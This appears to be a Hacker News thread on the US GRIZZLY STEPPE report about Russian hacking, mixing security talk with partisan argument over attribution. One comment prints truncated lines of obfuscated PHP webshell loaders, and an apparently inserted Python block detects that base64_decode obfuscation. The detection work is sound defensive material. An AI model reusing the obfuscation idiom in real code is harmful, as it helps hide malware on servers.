> By the way iOS is the only popular operating system I know that doesn't allow to execute files downloaded from web or emails.

Windows 8, 8.1, and 10 don't allow it either. SmartScreen will block unsigned executables by default[0]. Enterprise customers should be using AppLocker which does a lot of what SmartScreen does, but with more flexibility and control.

The issue arises when [bad] System Administrators disable SmartScreen because it is a "hassle" and don't deploy AppLocker in its place. This effectively sends their users back to a Windows 7 level of security.

If Microsoft forced either SmartScreen OR AppLocker, then we'd have people on here screaming about freedom, Microsoft is evil, "Embrace, extend and extinguish," year of the Linux desktop, and so on. This is the best they can do without treating System Admins like babies (even when they're going to use that power for "evil").

[0] https://blogs.msdn.microsoft.com/ie/2012/08/14/microsoft-sma...


Isn't there a history of signed malicious things? For example:

https://www.zscaler.com/blogs/research/yet-another-signed-ma...


There are a handful of scattered examples.

Fortunately, because of how signing works, it makes malware that is signed incredibly easy to detect, since by the very nature of the signature the malware's contents cannot be altered.

Plus signing is costly, and that within itself can make malware attacks uneconomical. It also makes getting a signature rather complex since you need fake identification and payment to avoid being carted off by the authorities.

Overall signing requirements are a huge net win for the "good guys." And while it isn't a hard security boundary, it is a damn effective one in the real world.


"If Microsoft forced either SmartScreen OR AppLocker"

Meh, just add a button or clickable link that allows the sysadmin to swiftly disable such warnings. Just make sure to put a scary-enough disclaimer that doing so can expose you to very bad, malicious stuff, from ill-intentioned people. It might get more application publishers to implement signing, just as Vista and 7 got rid of the "run everything as administrator" mentality through the use of UAC warnings.


Whatever the default level SmartScreen is already has a ding and a warning pop up about unknown executables. But it's amber and not red, and most people just click through it (I know I do).


I think there should be a separate UI for installing or running a downloaded program (with a huge red warning) so the users cannot accidentally run anything.


The problem here is that the system is not secure by default, one needs to hire a qualified specialist to set everything up. By default the user can run executable attachments or files downloaded from browser and it is a wrong design decision made many years ago. Users do not understand what is an "executable file", they got used to click an icon to see the file contents. This is just poorly designed UI that helps to deceive a user.

> If Microsoft forced either SmartScreen OR AppLocker, then we'd have people on here screaming about freedom, Microsoft is evil,

There could be a separate UI for installing software or even a package manager. Microsoft doesn't want to change anything because it is still the leader and earns huge profits.


It is secure by default. Out of the box SmartScreen blocks unsigned executables like I stated above.

System admins are going out of their way to disable default protections.

Also Windows 10 has a package manager and app store.


>The report also contains a pretty useless firewall rule named "PAS TOOL PHP WEB KIT FOUND" that can be used to search malware in PHP files. It is interesting that they have replaced digits in 'base64_decode' function name with regexp as if there were any other similar functions.

If you read that regexp carefully, it's more complicated than that. It doesn't match base64_decode, but it would match `='base'.(32*2).'_de'.'code'`. That's obfuscation in the payload, and in another comment I linked to some code that uses exactly this unusual (and pointless) obfuscation [1]

[1] https://news.ycombinator.com/item?id=13281008


> The report also contains a pretty useless firewall rule

For what it's worth Yara is not a firewall. It's essentially an intelligent grep for incident response. An IOC is an indicator of compromise, so it's after the fact not a preventative measure.

http://virustotal.github.io/yara/


It should be noted blocking execution isn't the problem, it's the access an unknown executable has to the host system.

A well hardened MAC system, which requires no effective user intervention, can limit access of arbitrary programs to a minimal set of files and devices to stop bad actors from actually getting anything without the user having to modify the MAC policy.


Check out the Mooltipass, it's the hardware security device I want but can't afford because of college.


Can experts weigh in on the utility of this thing? To my ignorant eyes it looks excessively complicated.

To save you a search it's here: https://www.themooltipass.com/


The idea is you put your passwords into this box. This box can only be opened with a Chip&Pin card. This magic box can be backed up and restored if ever lost or stolen. The magic box is also "physically-ish" separated from the computer. It's Impossible (TM) to compromise the security of all the passwords in the magic box. It goes something like this.

Setup goes like this:

   1. User buys device which comes with keycards.
   2. User selects pin code for their device

Usage goes like this:

   1. User attempts to login to site
   2. Browser plugin requests login details from device
   3. User is prompted for chip & pin from the device
   4. User puts card into device and inputs pin
   5. User clicks a button physically to approve transaction
   6. If correct, data is sent to the browser for login
   7. Subsequent chip and pin signins aren't needed for X timeout

The interaction is more 'tedious' for some people but it's not meant for the people who are concerned with typing in a 4-digit pin. It's meant for people who would otherwise have to remember 20 digit alpha-num-sym passwords for 30 different accounts, for which this is much easier and safer to do. It's also something people know how to do. If you've gone to a supermarket you are now prompted for Chip & Pin. People are already motivated to learn how this works (want your groceries for the week? Use the chip and pin!).

On the other hand, the average person doesn't need code words to get access to a protected resource. Bar "special organizations" I'd say there are very few people who are trained naturally into the concept of passwords. It's simple but it isn't done nearly enough for everyone to understand it, which is in stark contrast when compared to using a credit card with a pin code. Also, they could use similar or even the same pin code as their bank pin if they aren't concerned about security.


>I have looked through the report. The only useful information was brief description of attack methods, everything else looks like a list of general recommendations one can find on the OWASP website.

https://news.ycombinator.com/item?id=13280068

Look again, they handed you more than enough information.

>The report also contains a pretty useless firewall rule named "PAS TOOL PHP WEB KIT FOUND" that can be used to search malware in PHP files. It is interesting that they have replaced digits in 'base64_decode' function name with regexp as if there were any other similar functions.

  root@:~/super_secret_govt_malware_samples# grep * -e bas|tail -n2
  D285115E97C02063836F1CF8F91669C114052727C39BF4BD3C062AD5B3509E38:<?php $_f___f='base'.(32*2).'_de'.'code';$_f___f=$_f___f(str_replace("\n", '', 'FeBvsTxs6EyYpYb/gJ9ckCbVgYYH9D56SKL+O6KdPjkDV91JgHr1g8WRH7/uYOda3hUgVLO064UXPF5K
  DA9F2804B16B369156E1B629AD3D2AAC79326B94284E43C7B8355F3DB71912B8:<?php $l___l_='base'.(32*2).'_de'.'code';$l___l_=$l___l_(str_replace("\n", '', 'QbO8tTv2NBoj4kUpujJlanEQeWDR+lrAJa6TWEnQEGF/uIiq3/G4ox/YCpaqsd6+QRNaT2pbpyBIDnlo
  root@:~/super_secret_govt_malware_samples# 
Why is everyone trying so desperately to attack and discredit this report?
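Detection logic for the obfuscation discussed in this comment and the one above it (an arithmetic expression standing in for the "64" in base64_decode, plus the str_replace newline-stripping idiom), as an added Python example: this is neither the report's Yara rule nor any commenter's code, the regex and the PHP samples are constructed here, and the exact rule from the JAR is not reproduced.

```python
import re

# Hypothetical pattern modelled on the obfuscation the thread describes: the
# samples spell the function name as 'base'.(32*2).'_de'.'code', so a literal
# search for base64_decode finds nothing. The two factors are captured so the
# caller can check the arithmetic really yields 64.
OBFUSCATED_B64 = re.compile(r"='base'\.\((\d+)\*(\d+)\)\.'_de'\.'code'")

# Second idiom visible in the quoted samples: the payload is run through
# str_replace("\n", '', '...') to strip line breaks before decoding.
STRIP_NEWLINES = r"""str_replace("\n", '', '"""


def find_obfuscated_base64_decode(php_source):
    """Return (offset, product) for every obfuscated construction found.

    The product of the two factors is returned so the caller can confirm the
    concatenation spells base64_decode (product 64) rather than some other
    arithmetic that merely fits the shape.
    """
    return [(m.start(), int(m.group(1)) * int(m.group(2)))
            for m in OBFUSCATED_B64.finditer(php_source)]


def is_pas_like(php_source):
    """Flag a file only when both idioms are present and the arithmetic is 64."""
    hits = find_obfuscated_base64_decode(php_source)
    return any(p == 64 for _, p in hits) and STRIP_NEWLINES in php_source


# Constructed samples (short placeholder payloads, not the base64 from the report).
SAMPLES = {
    # same shape as the samples quoted above, with (32*2)
    "pas_32x2": r"""<?php $_f___f='base'.(32*2).'_de'.'code';$_f___f=$_f___f(str_replace("\n", '', 'QUJD'));""",
    # same trick with different factors: still 64, still caught
    "pas_8x8": r"""<?php $l___l_='base'.(8*8).'_de'.'code';$l___l_=$l___l_(str_replace("\n", '', 'REVG'));""",
    # a plain call is ordinary PHP and exactly what the pattern does NOT match
    "plain": r"""<?php $data = base64_decode(str_replace("\n", '', $_POST['d']));""",
    # right shape, wrong arithmetic: would spell base6_decode, so not a hit
    "decoy": r"""<?php $f='base'.(2*3).'_de'.'code';$f(str_replace("\n", '', 'QUJD'));""",
}


def classify(samples):
    """Map sample name -> True if the file looks like the obfuscated loader."""
    return {name: is_pas_like(src) for name, src in samples.items()}


if __name__ == "__main__":
    for name, verdict in classify(SAMPLES).items():
        print(f"{name:9s} {'HIT' if verdict else 'clean'}")
```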


It is interesting to see the strongly negative positions that some people take on any of these reports. It is almost like folks can have ulterior motives or know very little about how to protect sources and methods.


> Why is everyone trying so desperately to attack and discredit this report?

Because half of the US voting population are heavily invested in it being false.


Ok, you are right, I didn't notice the multiplication sign. This rule really can detect infected PHP files.


Folks, the point of this report is not to justify the punitive actions taken today. It is to provide information that companies can use to protect themselves against similar attacks in the future.

So if you judge it by whether it "makes the case" against Russia, it will be lacking. We don't need 100 comments pointing that out.


You're ignoring the political context in which it was released.

1. Released the same day as the announcement of formal Russian Sanctions

2. Released the same day US made 35 "diplomats" (aka. known Human Intelligence Officers) Persona Non Grata. Which is a big deal.

This type of document is not intended to "make the case" because we don't do that.

Making a case for something, by definition, would reveal sources and methods which we highly guard. It also opens the administration up for scrutiny because there are many pieces which cannot be revealed because of classification - so it's impossible to fully "make a case."

This type of report does however hint suggestively and point in the direction of support. They just let you put the pieces together.

In fact they don't have to put anything out and most people wouldn't even know to ask (outside of possibly FOIA, which won't go far in these cases).

[1] https://en.wikipedia.org/wiki/Persona_non_grata


It appears to confirm what we knew: the DNC's failure to adhere to basic security protocols, which would be enforced in any corporation with more than a couple dozen employees (edit: or not, see eropple's comment below), allowed its systems to be compromised by script kiddies (for political reasons, the USG insists these script kiddies are sponsored by the Russian government, and insists we take them at their word).

This document says the attack would've failed if the DNC had watched out for SQL injection and if DNC staffers had not fallen for a phishing scheme. We're supposed to believe only a nation-state could've conducted these attacks? This is "Baby's First Hack" level stuff.

This only further proves the government's propaganda policy for dealing with prominent cybersecurity breaches: blame it all on a foreign boogieman, as they did in the case of the Sony leak, so that the public doesn't catch on to just how very vulnerable all their electronic data is to practically anyone with the inclination to attempt to steal it.


> which would be enforced in any corporation with more than a couple dozen employees

No they wouldn't, and you are one of the people here who I would say should very well know it. :p

The DNC screwed up, but the overwhelming majority of everybody else screws up to this level or worse on the regular.


Yeah, you are completely right, and I completely agree, as I imply later in the post. Such mistakes are extremely common across the spectrum, at companies large and small alike (remember when American Express accidentally exposed an internal debugging application? [0] :O). Cybersecurity is still very difficult for everyone, and I don't mean to imply any differently.

My quip was meant to emphasize that the security breaches described are basic, and likely could've been blocked if the DNC had, at the time, been following good security practice. Many corporations withstand such attacks routinely (and as you note, many don't).

The penetration of the DNC was not something that required professional-level skill, let alone the resources of a nation-state.

[0] http://www.securityweek.com/amex-developers-leave-debug-tool...


What it really requires is the blind eye (or knowing nod) of a nation state, since with the level of unuttered evidence (and the private orgs named which no one seems to be mentioning here) the idea that "we won't prosecute you if you do this" is the nation-state sophistication here. In the US you'd normally face justice for this, regardless of the locale or the ease of the break-in.


While the methods used were very simple, I have an opinion why this could be done for some government or political party. The emails and data from a political party are probably very boring stuff, so a typical hacker would not bother to spend a lot of time sending thousands of phishing emails to get access to them. And later he would have to read through them to find some facts the mass media would be interested in. Usually hackers hunt for things like credit card numbers or fame.


Hackers have been targeting boring government docs for as long as there's been hacking, sometimes just for laughs, bragging rights, etc.

If all the docs are boring, isn't that all the more reason to think that a nation state had nothing to do with this?

The NSA would've intercepted your new router in the mail with a backdoor and could've used a TEMPEST van to read your screens from miles away. I have to believe those mighty Russian hackers have figured out comparable tricks by now and aren't reliant on people falling for idiotic phishing scams to get their information.

I mean, they have Snowden, who showed us the NSA's TAO programs... right?


Why bother when it wasn't needed?

They have the motive to do it, as much or more than anyone else, and certainly the capacity. They are tied to disinformation campaigns [1] that seem to have the goal of sowing suspicion between allies who oppose them, and have everything to gain by swaying our political process.

That isn't enough evidence of course, but I'm surprised by the suspicion here and I can only chalk it up to the increase in cynicism that is partly a result of these very actions. Because the Bush administration managed to finagle the intelligence enough to justify the war in Iraq we can just ignore our intelligence agencies whenever we want, right?

Internal bullshit like what was going on at the DNC is annoying, frustrating and unfortunate, but people are falling for the trap hook, line and sinker. This happens everywhere, you can be damn sure it was going on at the RNC as well, but Republicans wouldn't have abandoned their party (at this point it's pretty clear nothing can make a fair number of them abandon their party); independents and some liberals are doing exactly what the hackers want (whoever they turn out to be, likely the Russians): we are getting cynical and despondent. Rather than getting involved and saying we should clean house, it's like "well if you didn't suck so much you wouldn't have lost," while doing nothing to make things suck less.

[1] http://www.nytimes.com/2016/08/29/world/europe/russia-sweden...


Because an attack like that gives you short term access which isn't particularly valuable to a nation state. It was quickly found out and stopped.


Also the report doesn't say anything about not having your password literally be password!


Exactly this. If it was just a recommendation notice, why release on same day. Plus the thing is titled: "Russian Malicious Cyber Activity"


The Obama administration announced they will release evidence about the hack in "3 weeks". So they will be making the case. It will obviously just be redacted.


It seems notable that many of these comments are jumping on this for not providing proof that it was Russia, when that was not the intention of the report.

The first page states-

>This JAR provides technical indicators related to many of these operations, recommended mitigations, suggested actions to take in response to the indicators provided, and information on how to report such incidents to the U.S. Government.


The bloomberg article I read (http://archive.is/j5wRd) presented it as evidence. Maybe other publications are doing the same.

>As part of the administration’s response, the FBI and Homeland Security Department also released a report with technical evidence intended to prove Russia’s military and civilian intelligence services were behind the hacking and to expose some of their most sensitive hacking infrastructure.


The "evidence" cited is not the handful of unclassified details included, it's the fact that the FBI and DHS are willing to go on record publicly accusing Russia. There are no asterisks or weasel-words or "allegedly"s. Just a clear "Russia did it."

There are only two possible explanations for that:

1) A massive conspiracy in which the leaders of practically the entirety of the US military/intelligence community are willing to go on record with a hoax that will easily be unraveled by the incoming administration in a few months

2) There is clear and damning evidence that Russia did it, but it's classified


I'd guess a third option, actually: It's just a best guess, but they don't like being questioned.

If they had damning evidence it'd be in their interest to release it.


Not if it would give any humint sources away, and they may have kicked out people to allow a source to step into their shoes - as the UK did to put their man in as the Resident in London


It's somewhat obvious from the context, but for anyone not familiar with military jargon I think the parent post meant to say "humint" instead of "humit", which is shorthand for "human intelligence" or in layman's terms "spies".


oops my bad


Of course, Iraq and WMD do little to build confidence.

Not that I don't believe you -- motive and opportunity for Russia are crystal clear here, and given that the results of the election are not going to be overturned, I see little gain for the current administration to lie about this.


>1) A massive conspiracy in which the leaders of practically the entirety of the US military/intelligence community are willing to go on record with a hoax that will easily be unraveled by the incoming administration in a few months

Unless the actual perpetrators were the US intelligence community and/or the incoming administration. Then they could both hide their tracks or have no reason to unravel this. But why suspect the group with the most to gain or the community with the most experience doing this? It's not like there's any other examples of a Republican politician breaking into the DNC to tap their communications, using the intelligence agencies to help cover it up...


What does the intelligence community have to gain by perpetrating this hack?


Billions of dollars plus whatever power comes from picking the president and presumably having a potential deepthroat if they don't behave. And remember, the intelligence community is not unified. Even though Obama has been a huge ally of the intelligence community, not all branches got the same deal.


Ok I guess I meant specifically, is there any reason to think the intelligence community would prefer Trump? Presumably they would prefer someone who was more interested in foreign involvement, and less likely to provoke mass donations to privacy and civil rights organizations.


Incredibly late, but I noted that the community is not unified, some of it is just about getting their candidate. Additionally, some of Trump's proposals mean a lot more cash/power for intelligence agencies, things like harsher standards on immigrants and more control over the internet.


If hypothesis 1 were true, then the conspirators would be betting there will be no "incoming administration", not very soon, I'd say.

If hypothesis 2 were true, there would also be some conspiracy to keep that important information classified.

Also, I can't help thinking about Snowden and the blown whistle of the NSA spying scheme.


Snowden is a powerful trump card for dismissive claims like "massive conspiracy in which the leaders of practically the entirety of the US military/intelligence community are willing to go on record with a hoax" that used to work so well.

We know our security agencies (and high level politicians) are not just dishonest, but actively violating the constitution. That people still mock those who distrust these agencies is so strange.


It's not that I don't think they would lie about anything, it's that I don't think they would lie about something this trivial and small. The NSA lied about the multi-year global surveillance program which serves their core mission, so that means that the NSA and also the FBI and DHS will lie about a relatively minor news story? How is this even in their interests?

I'm more than willing to believe they're lying but I need something. Some evidence, a credible motive, a plausible story. You can't just say, "Well the FBI says so, and they lie all the time, so we can be sure it isn't so." That's the road that leads to disbelieving the moon landing.


You don't think they might be a bit concerned a loose cannon like Trump might be a little more curious than normal candidates what sorts of interesting things they get up to, and where they spend their significant budgets?

> but I need something

That's how a lot of people feel about this whole "Russians rigged the election" thing, we'd like some evidence a little more substantial than "trust us", or at least we'd like to hear those words from someone we can trust, although no names come to mind. I can't think of very many public figures that I would trust these days.


...they might be a bit concerned a loose cannon like Trump might be a little more curious than normal candidates what sorts of interesting things they get up to, and where they spend their significant budgets?

It is perhaps significant that the "further analysis" leakfest started after Trump had already disappointed the spooks by bagging their special briefings, rather than back when all of the actual underlying facts were publicized well before election day. They always think they've got a thick enough profile of the incoming executive to bend him as far as they want. For example, Obama never closed their favorite EST Caribbean vacation-and-torture resort, even though doing so was a major campaign plank the first time around. Who knows what incriminating documents proved so persuasive? Maybe this time we've somehow elected someone who won't be in their pocket from Day One?


Ya, who knows....I do think he is very different than your typical politician, but exactly how no one really knows. You might be right that they thought they had the goods on him with things like the sex talk tape, but when he basically shrugs his shoulders and it slides right off his back, I could see how that might be worrying to someone who is also in the influence game.

I agree on Obama, I think something must happen in the first few days where the new President is sat down and gets told how things really work. I would think that is what happened to many of Obama's promises. I doubt anyone would look forward to having that talk with Donald Trump.


With option 1, it will be hard for the new administration to unravel it without confirming the bias that they are in the pay of Russia. However this level of subtlety may be beyond Trump.

Perhaps Obama is trying to make Trump's new administration look illegitimate?


Option 1's problem is far less that anyone in the new administration is in the pay of Russia, but that the GOP for more than a decade has been claiming government is totally incompetent, cannot be trusted to do anything, should not be trusted, and could not investigate itself. This is hardly any different from the surveillance state: creating that infrastructure puts it right into the hands of political adversaries when the political winds change, and now creating distrust in government generally, rather than just in political enemies, means the distrust is inherited when political winds change. It's deeply damaging to have this concept of "saying things makes them true/untrue" rather than an appeal to facts.


> presented it as evidence

Quite predictable, since they also considered the wild accusations of various politicians of a high level Russian conspiracy to be evidence.


If you rephrase your hysterical wording as "major bipartisan concern across every intelligence agency and nearly all ranking members of both houses of Congress, including the heads of both Intelligence Committees," then I'm not really sure what more evidence you or I could hope for from such an obviously sensitive, active topic for the time being.


By mentioning that they are "ranking members" you make an argument from authority that is predicated on the legitimacy of the government alone, effectively saying "kneel and take whatever they say at face value".

In my view, they are all self-serving career politicians and none have shown any particular reason they should be trusted or respected. They were the ones who urged the knee-jerk reaction in Iraq which has cost trillions of dollars and many lives, among many other bad decisions that they all agree on.


Fine. But (assuming you extend this attitude to "the mainstream media" as well) you've created for yourself an ontology of the world in which it is impossible to claim any knowledge of anything outside your direct field of view. I'm not really sure how you intend us to accomplish much of anything without _some_ ability to trust _someone_ else. And bipartisan agreement from bitter enemies who have little or nothing to gain personally from such statements is about the lowest bar of trust I can imagine.


Politicians stand to gain government expansion when they scare the population.

So it's not nearly as low of a bar as you think. It's like you're claiming we must trust pharmaceutical representatives from competing companies when they both agree that we all need more pills.


Who's expanding what part of government here?


Every Democrat and most Republicans?


The issue is not so much authority, the issue is urgency.

Why is there urgency to rush to judgment about alleged Russian election meddling?

If it happened, then unless anyone thinks the outcome of the election should be reversed, we have four years to get to the bottom of it, take action, and prevent it from happening again.

It's very much reminiscent of the blind urgency to invade Iraq on shaky evidence. Note that one tactic used to get people to act is to create urgency. The simplest example is "this offer expires in 5 minutes..."

It's not so much that I give no credit to any officials as having authority, it's that they all agree on the knee-jerk urgency when there is no apparent need to do so, and none feel obligated to offer a point by point probability assessment of whatever information, inference, or intelligence has them 100% convinced, since the information disclosed so far paints a vague, circumstantial picture.

This sort of elitist disregard for the basic rationality of the public is not something I can stomach, so I simply can't take their assurances at face value.


That's not what "ranking members" communicates; rather, it suggests that the conclusion transcends partisan politics. That doesn't mean it doesn't succumb to other biases (though I don't think so), but it is a meaningful statement to make.


I think there is a coalition of peculiarly anti-Russian hawks who have been the most vocal in their opposition to Russia's behavior in Crimea, etc.

This likely transcends party lines in the same way that support for wall street or the oil industry transcends party lines.


So, that's what I'm saying: that the "ranking members" support the conclusion doesn't dispose of all bias, but it does dispose of the Trump vs. Clinton bias. It's up to you how to weight [Trump vs. Clinton] vs. [Russia vs. US].

But my impression is that [Trump vs. Clinton] is way more powerful than any other bias right now.


> But my impression is that [Trump vs. Clinton] is way more powerful than any other bias right now.

I think this is correct, and largely why the Russia meddling has become more an article of faith than a highly concerning possibility.


Was it any different with Iraq WMD?


Yes. Many, many parts of the intelligence community produced reports contradicting any claims of WMD evidence, and were summarily ignored by a very not-bipartisan administration. There is basically total consensus among every intelligence agency that the evidence points to Russia.


Not just ignored, but specifically worked around.

http://www.newyorker.com/magazine/2003/05/12/selective-intel...


Basic sources on the total consensus?


https://www.dhs.gov/news/2016/10/07/joint-statement-departme...

> The U.S. Intelligence Community (USIC) is confident that the Russian Government directed the recent compromises of e-mails from US persons and institutions, including from US political organizations.

This is an official joint statement from the USIC, which is an official body composed of 16 different intelligence organizations:

https://en.wikipedia.org/wiki/United_States_Intelligence_Com...


That report presents no evidence, comes from political appointees, and generally only says that it might be consistent with something Russia would like to do without explaining why.

Also, not sure how the agency count helps anything. Exactly what did agencies like the NRO and Coast Guard contribute here?


My understanding was that they had agreed on the likely Russian origin of at least one system from which emails were obtained, but that they had disagreed on the motivation for the leaks.


The funny part about all of this to me, is that if most companies with data to lose aren't already taking these recommendations.. then they've already been cracked.

Most of this report is pretty simple social engineering tactics/table stakes.


Not only many of these comments, but a few commenters jumping on the thread within minutes trying to repeatedly question or throw shade on Russia's role in this.


well I suppose their phones will work really well from now on wink


Agreed - this is meant to present the evidence or at least the public part of.

If this is all there is; then the skepticism coming from the incoming administration is warranted.


You said "Agreed" then said the exact opposite of what the parent said.


> the point of this report is not to justify the punitive actions taken today.

You mean the point of the persons who wrote it? Probably not.

But the intent of those who decided to release it today? It most likely was. If so many HN commenters--sophisticated computer users and people with cognitive abilities way above average--feel like it doesn't go without saying, how many CNN or Fox News viewers will realise it doesn't make the case against Russia?

They'll just remember that some documents were released by some US intel agencies, proving that the Russians did "it" (without even a clear idea of what "it" might be), while the US govt punished them. That's good enough for people who saw no problem with going to war against Iraq because of 9/11.

What worries me about all of this Russian hackers + Fake News agitprop is that it looks like a perfect prelude to justify Internet censorship in Western democracies. When the Internet allowed Obama to "steal" the Democratic party from Clinton in 2008, it was OK: maybe a bit embarrassing, but his policies weren't really that different from hers. But in 2016, with Sanders almost stealing the party again, and Trump taking the GOP and then the general election by storm, politicians and their sponsors realised they didn't effectively influence voters through mainstream media any more. They've finally realised how scared they should be of the Internet, and they'll want to "civilise" it, i.e. make it as controllable as billionaire-owned TV channels and newspapers. I hope they'll fail, but some of them will try to.


The report itself seems to claim it provides attribution. Am I misunderstanding?

> Previous JARs have not attributed malicious cyber activity to specific countries or threat actors. However, public attribution of these activities to RIS is supported by technical indicators from the U.S. Intelligence Community, DHS, FBI, the private sector, and other entities. This determination expands upon the Joint Statement released October 7, 2016, from the Department of Homeland Security and the Director of National Intelligence on Election Security.


The report is literally titled: "GRIZZLY STEPPE – Russian Malicious Cyber Activity"

Yet it doesn't actually make a case for Russian Malicious Cyber Activity. People are pointing out the obvious spin on this especially since it's extremely light on technical details or a reason to exist other than propaganda. Reasonable companies don't need to be taught about phishing attacks.
